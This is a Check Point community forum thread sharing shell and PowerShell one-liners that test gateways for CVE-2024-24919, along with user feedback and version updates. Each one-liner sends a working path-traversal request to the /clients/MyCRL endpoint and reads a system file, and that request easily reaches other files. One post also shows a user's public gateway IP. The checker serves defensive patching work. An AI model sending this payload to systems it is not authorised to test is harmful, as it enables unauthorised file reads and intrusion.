topic Re: ONELINER - Check CVE-2024-24919 Vulnerability in General Topics

ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Sun, 02 Jun 2024 20:34:36 GMT

Run this onliner to check if your Check Point Gateway is vulnerable to CVE-2024-24919 (sk182336).
GAIA gateways and SMB gateways are supported.

1) Depending on where you want to run the Onliner, you can copy and paste the code for GAIA, Linux or Powershell.
Copy the code into the CLI.

1a) GAIA version for expert mode:

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl_cli --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

1b) Linux version (all other linux distributions):

clear; echo -e "CVE-2024-24919 check tool by Heiko Ankenbrand 2024\n\n";read -p "Destination IP: " ip_addr; curl --connect-timeout 5 -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/cp-release" "https://$ip_addr/clients/MyCRL" | awk ' {if (index($0, "Check Point") != 1) {print "\nNo vulnerability could be detected!"} else {print "\nAttention! \nThis system is vulnerable to CVE-2024-24919. More read here sk182336."}}' |sort | uniq ; echo -e "\n"

1c) Windows Powershell version:

clear;$C="";$O="";[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Add-Type -AssemblyName Microsoft.VisualBasic;$IP_addr = [Microsoft.VisualBasic.Interaction]::InputBox("This is a test tool to check if your Check Point Gateway is vulnerable to CVE-2024-24919.`r`n`r`n`r`nDestination IP:", "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", "");try{$C=(Invoke-WebRequest -Uri "https://${ip_addr}/clients/MyCRL" -Method POST -Body "aCSHELL/../../../../../../../etc/cp-release" -TimeoutSec 5 )} catch [System.Net.WebException] { if([int]$_.Exception.Response.StatusCode -eq 404) {$O="`r`nNo vulnerability could be detected!`r`n" } else {$O="`r`nGateway is not reachable!`r`n"} }; if ($C.StatusCode -match "200") {$O="`r`nNo vulnerability could be detected!`r`n"; if ($C.content -match "Check Point") {$O="`r`nAttention! `r`nThis system is vulnerable to CVE-2024-24919. More read here sk182336.`r`n"}};Add-Type -AssemblyName System.Windows.Forms; $result = [System.Windows.Forms.MessageBox]::Show($O, "CVE-2024-24919 check tool by Heiko Ankenbrand 2024", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::None)

2) Now enter the IP address of the gateway to be checked.

GAIA/Linux:

Powershell:

If the following message appears, your system is vulnerable:

Attention!
The system is vulnerable to CVE-2024-24919.
More read here sk182336.

If the following message appears, your system is not vulnerable:

No vulnerability could be detected!

If no output appears, the system is not be reachable.

---

Version:
1.5          06/02/2024                                                     Powershell interactive version with windows
1.4          06/01/2024                                                     Powershell version with correct status codes
1.3          06/01/2024                                                     Linux and Powershell version provided
1.2          05/30/2024                                                     error with SMB applications fixed
1.1          05/29/2024                                                     fixed error with output
1.0          05/28/2024       first version

Re: ONELINER - Check CVE-2024-24919 Vulnerability

natascha — Fri, 31 May 2024 16:47:31 GMT

Very helpful tool.
We have checked about 40 gateways and found a few without a hotfix in our company.

Thanks @HeikoAnkenbrand

Re: ONELINER - Check CVE-2024-24919 Vulnerability

renzi — Fri, 31 May 2024 16:55:04 GMT

Nice

Re: ONELINER - Check CVE-2024-24919 Vulnerability

the_rock — Fri, 31 May 2024 23:31:30 GMT

Fantastic as always!

Re: ONELINER - Check CVE-2024-24919 Vulnerability

dceko — Sat, 01 Jun 2024 07:39:08 GMT

Hi,

Can you modify script to check only for HTTP Response code after "| sed", because i think every gateway that respond with response code that is not 404 - File Not Found is vulnerable? This way this check can be used for small boxes, not managed by management server.

Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Tue, 04 Jun 2024 13:54:08 GMT

Here you can read the latest information from Check Point:

- Preventative Hotfix for CVE-2024-24919 - Quantum Gateway Information Disclosure

- Important security update - stay protected against VPN Information Disclosure (CVE-2024-24919)

Re: ONELINER - Check CVE-2024-24919 Vulnerability

the_rock — Sat, 01 Jun 2024 13:24:30 GMT

I just ran it on my Azure fw and it did not display anything...weird, though I do have vpn enabled, as well as remote access too. I may need to read up on all this again, as I came back from vacation, so its possible this is not even related to original issue with local vpn users/remote access. Never mind, read it afterwards, it is related, but will look into it more Monday.

Andy

CVE-2024-24919 check tool by Heiko Ankenbrand 2024

Destination IP: 52.229.98.249
[Expert@azurefw:0]#

Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Sat, 01 Jun 2024 14:21:43 GMT

I have adapted the code so that it should now also work with SMB applications.

Re: ONELINER - Check CVE-2024-24919 Vulnerability

Moudar — Sat, 01 Jun 2024 17:59:43 GMT

When running it on my gateway expert mode i get this:

Destination IP: 10.10.11.11 <!DOCTYPE html><HTML><HEAD> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9,EmulateIE8"><meta name="others" content="WEBUI LOGIN PAGE" /><TITLE>GAiA</TITLE> <link rel="shortcut icon" href="/login/fav.ico"> <link rel="stylesheet" type="text/css" href="/login/ext-all.css" /> <link rel="stylesheet" type="text/css" href="/login/login.css" /> <STYLE TYPE="text/css"> .ext-ie .webui-login-fld{font-size: 11px;} </STYLE> <script type="text/javascript" src="/login/ext-base.js"></script><script type="text/javascript" src="/login/ext-all.js"></script><script type="text/javascript">var errMsgText = "";var bannerMsgText = "";bannerMsgText += "This%20system%20is%20for%20authorized%20use%20only.%0A";var hostname='fw01';var version='R81.20';var formAction="/cgi-bin/home.tcl";</script><script type="text/javascript" src="/login/login.js"></script></HEAD><BODY><noscript><div style='font-size:20px;position:relative;top:100px;'>For full functionality of this site it is necessary to enable JavaScript.</div></noscript></BODY></HTML>

Re: ONELINER - Check CVE-2024-24919 Vulnerability

the_rock — Sat, 01 Jun 2024 18:09:03 GMT

R81.20?

Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Sat, 01 Jun 2024 19:38:40 GMT

Hi @Moudar

This is the HTML code of the gateway login screen.
I have modified the onliner so that this will no longer be shown in the future.

Re: ONELINER - Check CVE-2024-24919 Vulnerability

genisis__ — Sun, 02 Jun 2024 08:16:15 GMT

Is there a oneliner we can run on the gateway itself and how does this work in VSX?

Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Sun, 02 Jun 2024 19:22:05 GMT

I think that should work in VS0.

Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Sun, 02 Jun 2024 19:31:14 GMT

Version 1.5 works as an interactive version with windows:

Re: ONELINER - Check CVE-2024-24919 Vulnerability

genisis__ — Sun, 02 Jun 2024 20:18:10 GMT

thanks Heiko

Re: ONELINER - Check CVE-2024-24919 Vulnerability

EitschStwoN — Mon, 03 Jun 2024 18:48:30 GMT

Hi Heiko,

Thanks for this script, it is really a shame that Checkpoint did not provide this themselves or at least refer to this article in the mitigation guide.

Looks like the problem has been around for a long time and its strange that this has never been seen in a CODE review.
Usually you trust a firewall not to have such rookie bugs.

Markus

Re: ONELINER - Check CVE-2024-24919 Vulnerability

GHOST — Tue, 04 Jun 2024 19:25:36 GMT

👍

Re: ONELINER - Check CVE-2024-24919 Vulnerability

the_rock — Tue, 04 Jun 2024 19:27:15 GMT

AWESOME!

Re: ONELINER - Check CVE-2024-24919 Vulnerability

HeikoAnkenbrand — Mon, 10 Jun 2024 14:17:25 GMT

@EitschStwoN

I think they don't want to publish the exploit code in the forum.
And from my point of view, that's a good thing.

Re: ONELINER - Check CVE-2024-24919 Vulnerability

the_rock — Mon, 10 Jun 2024 14:19:05 GMT

Totally agree.